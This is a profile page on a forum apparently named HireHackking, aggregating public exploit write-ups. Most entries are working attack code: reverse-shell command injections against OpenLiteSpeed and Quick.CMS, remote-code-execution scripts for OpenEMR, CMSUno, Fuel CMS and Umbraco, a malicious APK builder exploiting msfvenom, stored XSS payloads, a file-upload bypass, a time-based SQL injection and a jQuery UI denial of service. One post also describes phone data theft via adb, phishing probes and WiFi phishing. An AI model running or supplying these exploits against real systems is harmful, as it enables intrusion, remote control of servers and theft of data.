Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting # Exploit Author: Mahendra Purbia # Vendor Homepage: http://egavilanmedia.com # Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ # Version: 1.0 # Tested on: Windows 10 Vulnerable Parameters: Full Name Steps for reproduce: 1. go to http://localhost/PHPCRUD/ 2. now click on "add new record" and fill the details (in first name name use :"><svg onload=alert(1)// ) 3. Now reload the page and you will see that our XSS payload executed . Its an Stored XSS.
  2. HireHackking

    Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) # Date: 26/1/2021 # Exploit Author: cmOs - SunCSR # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.8 # Tested on Windows 10 Step 1: Log in to the dashboard using the Administrator account. Step 2 : Access Server Configuration > External App > Command Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon) Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value Step 5: Graceful Restart [POC] POST /view/confMgr.php HTTP/1.1 Host: target:7080 Connection: close Content-Length: 579 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://target:7080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://target:7080/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee; litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D; LSPA37FE0C43B84483E0=excYiZbpUS4%3D name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
  3. HireHackking

    OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)

    HireHackking posted a blog entry in Hacker Technology
    # Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) # Exploit Author: Alexandre ZANNI # Date: 2020-07-16 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3 # References: https://www.exploit-db.com/exploits/48515 #!/usr/bin/env ruby require 'httpclient' require 'docopt' shell_name = 'shell4.php' user = 'openemr_admin' password = 'xxxxxx' payload = 'php/reverse_php' lhost = '10.10.15.201' lport = 8888 doc = <<~DOCOPT OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution Usage: #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug] #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug] #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -s <filename>, --shell <filename> Filename of the PHP reverse shell payload -u <username>, --user <username> Username of the admin -p <password>, --password <password> Password of the admin -m <payload>, --payload <payload> Metasploit PHP payload -h <host>, --lhost <host> Reverse shell local host -t <port>, --lport <port> Reverse shell local port --debug Display arguments -H, --help Show this screen Examples: #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123 #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888 #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999 DOCOPT begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['manual'] shell_name = File.basename(args['--shell']) shell_path = args['--shell'] else shell_name = "tmp#{rand(1000)}.php" shell_path = shell_name end if args['semi-auto'] payload = args['--payload'] else payload = 'php/reverse_php' end # Authentication data uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default") data_1= { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => args['--user'], 'clearPass' => args['--password'], 'languageChoice' => '1' } # Reverse shell data unless args['manual'] puts "[+] Generating the reverse shell payload: #{shell_name}" %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name}) end data_2 = { 'site' => 'default', 'mode' => 'save', 'docid' => shell_name, 'content' => File.read(shell_path)} uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default") uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}") clnt = HTTPClient.new puts '[+] Authenticating' clnt.post(uri_1, data_1) puts '[+] Uploading the reverse shell' clnt.post(uri_2, data_2) puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}" clnt.get(uri_3) rescue Docopt::Exit => e puts e.message end
  4. HireHackking

    CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated) # Google Dorks: # inurl:uno/central.php # inurl:uno/config.php # inurl:uno.php intitle:"CMSUno - Login" # Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066 # Vendor Homepage: https://www.boiteasite.fr/cmsuno.html # Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz # Version: 1.6.1, 1.6.2 # Tested on: docker image: php:7.4-apache (Debian buster) # CVE : CVE-2020-25557 & CVE-2020-25538 # Vulnerabilities ## Discoverer: Fatih Çelik ## Discoverer website: https://fatihhcelik.blogspot.com ## Vulnerability 1: ## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25557 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html ## Vulnerability 2: ## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25538 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html #!/usr/bin/env ruby require 'httpclient' require 'docopt' # username = 'cmsuno' # password = '654321' # root_url = 'http://localhost:5000/' # command = 'pwd' doc = <<~DOCOPT CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated) Usage: #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> user name (if not default: cmsuno) -p <password>, --pass <password> User password (if not default: 654321) -c <cmd>, --command <cmd> Command to execute on the target -t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} -r http://example.org -c id #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang DOCOPT # Get anti-CSRF token def get_unox(client, auth_status) print '[*] Fetching anti-CSRF token: ' res = client.get(LOGIN_URL) case auth_status when false regexp = /name="unox" value="([a-f0-9]{32}?)"/ when true regexp = /Unox='([a-f0-9]{32}?)'/ end token = regexp.match(res.body).captures[0].chomp puts token return token end def login(client, user, pass) data = { 'unox' => get_unox(client, false), 'user' => user, 'pass' => pass, } puts '[*] Logging in' res = client.post(LOGIN_URL, data) return res.body end def exploit(client, user, pass, cmd, tech) payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// " case tech when 'user' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en" when 'lang' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}" else raise 'Wrong exploitation technique argument value' end headers = { 'X-Requested-With' => 'XMLHttpRequest' } #client.proxy = 'http://localhost:8080' puts "[*] Starting exploitation, using '#{tech}' param technique" client.post(VULNERABLE_URL, data, headers) # Login again to trigger uno/password.php clnt2 = HTTPClient.new return login(clnt2, user, pass).lines[..-2].join end begin args = Docopt.docopt(doc) pp args if args['--debug'] username = args['--user'] || 'cmsuno' password = args['--pass'] || '654321' technique = args['--technique'] || 'user' LOGIN_URL = "#{args['--root-url']}/uno.php" VULNERABLE_URL = "#{args['--root-url']}/uno/central.php" clnt = HTTPClient.new login(clnt, username, password) output = exploit(clnt, username, password, args['--command'], technique) print '[*] Command output:' case technique when 'user' puts "\n#{output}" when 'lang' puts ' blind RCE, no output with this exploitation technique' end rescue Docopt::Exit => e puts e.message end
  5. HireHackking

    Title《你安全吗》 Interpretation of the technical aspects

    HireHackking posted a blog entry in Hacker Technology
    This article only analyzes the technologies involved in film and television dramas, and does not explain the plot in detail. If you are interested, you can check it out. PS: Technical analysis is carried out in the plot order (1~4) episodes At the beginning of the TV, I showed me the first attack technology, a malicious power bank. It seems that I use a power bank to charge my phone, but during the charging process, I have obtained user information.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220915125414.png http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220915125944.png http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20220915130038.png Implementation principle This method involves 《利用树莓派监控女盆友手机》 in my previous article. It is actually very simple. It is to use the adb command to obtain the information of the phone. Of course, you can also use the adb command to install the shell. It is easy to implement, just turn on the mobile phone developers to choose first. But in reality, the phone developer option is turned off by default. It will not be possible in the case of television. Information Collection Collect information based on WeChat Moments http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/4_20220915130543.png Ten things you can see from non-friends in the circle of friends. Check the latest updates in the circle of friends and get relevant information from the other party. In addition, it was speculated that the heroine's husband was in a cheating situation. My cousin suggests that it is not necessary for work, so try to turn off this function in WeChat. Information collection based on WeChat steps http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5_20220915131352.png Through the WeChat steps, can you get what you are doing now? If you just woke up at 8 o'clock in the morning and your friend's steps have reached 5,000 steps, it means that he is very likely to be running and exercising. Information collection based on phishing links http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/6_20220915131541.png I have also written similar articles in my cousin's previous article. Through the probe, you can simply obtain the target's IP address, GPS information, photos, recordings, etc. However, as the security performance of the mobile phone improves, there will be pop-up prompts. Using Baidu Netdisk to backup data http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/7_20220915131932.png This is often encountered in life. Moreover, after installing Baidu Netdisk, backup address book and other information is enabled by default. You can give it a try! (It is best to replace the avatar too, so that it will be true) Use Didi to share your itinerary http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/8_20220915132245.png Through the above plan, the protagonist successfully obtained the other party’s mobile phone number and found the relevant account through WeChat. Of course, the computer of the network security expert was poisoned.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/11_20220915132907.png Cracking the driver's letter http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/14_20220915134645.png Of course, the director gave the password here. If it were the complexity of the password in reality, it would probably not be successfully cracked when the drama ended. Control the Internet cafe network http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/15_20220915140409.png This should be managed using operation and maintenance apps or mini programs. Not very difficult. Applications of Social Engineering Get useful information from the other party by picking up garbage. Therefore, in daily life, if orders such as express delivery and takeaway are not processed, they will cause certain information leakage. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/16_20220915141013.png Through the other party’s account information, enumerate other account information, such as Tieba, Weibo, QQ space, to obtain the other party’s relevant personal information. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/17_20220915141642.png WiFi Probe Long before, CCTV 315 exposed cases of WiFi probe stealing user information. The principle is that when the user's mobile phone wireless LAN is turned on, a signal will be sent to the surrounding areas to find the wireless network. Once the probe box discovers this signal, it can quickly identify the user's mobile phone's MAC address, convert it into an IMEI number, and then convert it into a mobile phone number. Therefore, some companies place this small box in shopping malls, supermarkets, convenience stores, office buildings, etc. and collect personal information without the user's knowledge, even big data personal information such as marriage, education level, and income. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/18_20220915150519.png android shell http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/21_20220915151414.png As can be seen from the video, the very basic msf controls android commands. But it is a bit exaggerated to be able to directly manipulate mobile phone editing. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/22_20220915151649.png wifi fishing Use fluxion for WiFi fishing. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/23_20220915154038.png PS (4-8) episodes, only analyze the technology in film and television dramas, and the plot and characters are not explained. Then, in order to obtain data from the fraud group, I sneaked to the computer room to download the server data.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220916135536.gif The software used here should use XFTP. This is also a physical attack! Physical Attack http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/R-C_20220916160749.jpg The so-called physical attack means that an attacker cannot find relevant vulnerabilities at the software level or system. If you cannot win the target for the time being, you will go to the field for investigation and sneak into the target through social engineering and other methods to attack. This kind of attack is the most deadly.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220916141442.gif Tools used in the network security competition. In the previous shot, it should be to use Owasp to scan the target website for vulnerabilities. To be honest, the page has not moved, I don’t know what I have scanned!http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/111_20220916142109.png After entering the second level of protection, the third game should still be the msf interface. Set the msf configuration parameters, but there has been no exploit and I don't know what to wait for. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/123_20220916142440.png When the countdown is three minutes, SQLmap injection should have started.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/145_20220916142633.png As can be seen from the video, the command used is The use of sqlmap -r 1.txt --batch --level 5 -v current-usersqlmap has been mentioned more in previous articles. The above command should be used to obtain the current system user through post injection. Parameter interpretation: -r 1.txt The target request data is stored in txt. Generally, burp is used to capture packets and save them as txt. -- The user does not need to enter YES or NO during the execution process, and the default value YES prompted by sqlmap will be used to run continuously. --level risk level, default is 1. When level is 5, many payloads will be tested, and the efficiency will be reduced. –current-user Gets the current username. Summary The network security tools involved in TV series are all common network security knowledge we usually have. The film and television dramas have expanded slightly, but from the perspective of the plot, it is still very good. Especially while popularizing network security knowledge to the public, it closely links topics related to the people such as online water army, online fraud, pig killing, online loans, etc. At the end of the video, some network security knowledge will be popularized to everyone, which is worth recommending!
  6. HireHackking

    Fuel CMS 1.4.1 - Remote Code Execution (2)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Fuel CMS 1.4.1 - Remote Code Execution (2) # Exploit Author: Alexandre ZANNI # Date: 2020-11-14 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu 16.04 # CVE : CVE-2018-16763 # References: https://www.exploit-db.com/exploits/47138 #!/usr/bin/env ruby require 'httpclient' require 'docopt' # dirty workaround to ignore Max-Age # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932 $VERBOSE = nil doc = <<~DOCOPT Fuel CMS 1.4 - Remote Code Execution Usage: #{__FILE__} <url> <cmd> #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <cmd> The system command to execute -h, --help Show this screen Examples: #{__FILE__} http://example.org id #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd' DOCOPT def exploit(client, root_url, cmd) url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'" res = client.get(url) /system(.+?)<div/mx.match(res.body).captures[0].chomp end begin args = Docopt.docopt(doc) clnt = HTTPClient.new puts exploit(clnt, args['<url>'], args['<cmd>']) rescue Docopt::Exit => e puts e.message end
  7. HireHackking

    jQuery UI 1.12.1 - Denial of Service (DoS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS) # Date: 20 Jan, 2021 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://jqueryui.com/ # Software Link: https://jqueryui.com/download/ # Version: <= 1.12.1 # CVE : CVE-2020-28488 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>DoS - jQuery UI 1.12.1</title> </head> <body> <h2>DoS - jQuery UI 1.12.1</h2> <div> <button onclick="exploit()">Exploit</button> </div> <p>PoC by Rafael Cintra Lopes</p> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script> <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script> <script> function exploit(){ for (var i = 0; i < 10; i++) { $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'}); } } </script> </body> </html>
  8. HireHackking

    Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) # Date: 2020-03-28 # Exploit Author: Alexandre ZANNI (noraj) # Based on: https://www.exploit-db.com/exploits/46153 # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig import requests import re import argparse from bs4 import BeautifulSoup parser = argparse.ArgumentParser(prog='exploit.py', description='Umbraco authenticated RCE', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80)) parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email') parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password') parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL') parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command') parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='') args = parser.parse_args() # Payload payload = """\ <?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\ """ % (args.arguments, args.command) login = args.user password = args.password host = args.url # Process Login url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" loginfo = { "username": login, "password": password} s = requests.session() r2 = s.post(url_login,json=loginfo) # Go to vulnerable web page url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx" r3 = s.get(url_xslt) soup = BeautifulSoup(r3.text, 'html.parser') VIEWSTATE = soup.find(id="__VIEWSTATE")['value'] VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'] UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'] headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN} data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT" } # Launch the attack r4 = s.post(url_xslt, data=data, headers=headers) # Filter output soup = BeautifulSoup(r4.text, 'html.parser') CMDOUTPUT = soup.find(id="result").getText() print(CMDOUTPUT)
  9. HireHackking

    Metasploit Framework 6.0.11 - msfvenom APK template command injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection # Exploit Author: Justin Steven # Vendor Homepage: https://www.metasploit.com/ # Software Link: https://www.metasploit.com/ # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 # CVE : CVE-2020-7384 #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b64encode # Change me payload = 'echo "Code execution as $(id)" > /tmp/win' # b64encode to avoid badchars (keytool is picky) payload_b64 = b64encode(payload.encode()).decode() dname = f"CN='|echo {payload_b64} | base64 -d | sh #" print(f"[+] Manufacturing evil apkfile") print(f"Payload: {payload}") print(f"-dname: {dname}") print() tmpdir = tempfile.mkdtemp() apk_file = os.path.join(tmpdir, "evil.apk") empty_file = os.path.join(tmpdir, "empty") keystore_file = os.path.join(tmpdir, "signing.keystore") storepass = keypass = "password" key_alias = "signing.key" # Touch empty_file open(empty_file, "w").close() # Create apk_file subprocess.check_call(["zip", "-j", apk_file, empty_file]) # Generate signing key with malicious -dname subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]) # Sign APK using our malicious dname subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file, "-storepass", storepass, "-keypass", keypass, apk_file, key_alias]) print() print(f"[+] Done! apkfile is at {apk_file}") print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
  10. HireHackking

    WordPress Plugin SuperForms 4.9 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution # Exploit Author: ABDO10 # Date : Jan - 28 - 2021 # Google Dork : inurl:"/wp-content/plugins/super-forms/" # Vendor Homepage : https://renstillmann.github.io/super-forms/#/ # Version : All (<= 4.9.X) # data in http request : POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 <=== exploit end point Host: localhost User-Agent: UserAgent Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996 Content-Length: 7058 Origin: localhost Connection: close Referer: localhost Cookie: -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="accept_file_types" jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <======= inject extension (|PHP4) to validate file to upload -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="max_file_size" 8000000 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="image_library" 0 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="files[]"; filename="filename.(extension)" <==== inject code extension (.php4) for example Content-Type: application/pdf Evil codes to be uploaded -----------------------------423513681827540048931513055996-- # Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4 u can get <id> from server reply .
  11. HireHackking

    Title: Copying of community access control ID card

    HireHackking posted a blog entry in Hacker Technology
    Everyone is welcome to like and share!
  12. HireHackking

    BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting # Exploit Author: LiPeiYi # Date: 2020-12-18 # Vendor Homepage: https://www.bloofox.com/ # Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 # Version: 0.5.1.0 -.5.2.1 # Tested on: windows 10 Vulnerable paper: /admin/include/inc_content_articles.php Steps to reproduce: 1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side. 2: Add the new post and then add the payload "payload: <img src=# onerror=alert('xss')>" in "text" parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
  13. HireHackking

    Quick.CMS 6.7 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) # Date: 2020-12-28 # Exploit Author: mari0x00 # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip # Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ # Version: <= 6.7 # CVE : CVE-2020-35754 #!/usr/bin/python3 import requests import sys from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "sEmail": username, "sPass": password, "bAcceptLicense": "1", "iAcceptLicense": "true" } login = s.post(url+"admin.php?p=login", login_data, headers=headers) sleep(0.5) #Exploit print((colored("[+] Adding shell command","blue"))) payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" shell = { "sOption": "save", "Back_end_only": payload } exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) sleep(1) #Triggering reverse shell (three times just in case) print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers)
  14. HireHackking

    Online Grading System 1.0 - 'uname' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection # Date: 2021-01-28 # Exploit Author: Ruchi Tiwari # Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request POST /onlinegradingsystem/admin/login.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/onlinegradingsystem/admin/login.php Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us Upgrade-Insecure-Requests: 1 uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin= #Application will load after 20 minutes. --------------------------------------------------------------------------------------------------------------------
  15. HireHackking

    Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
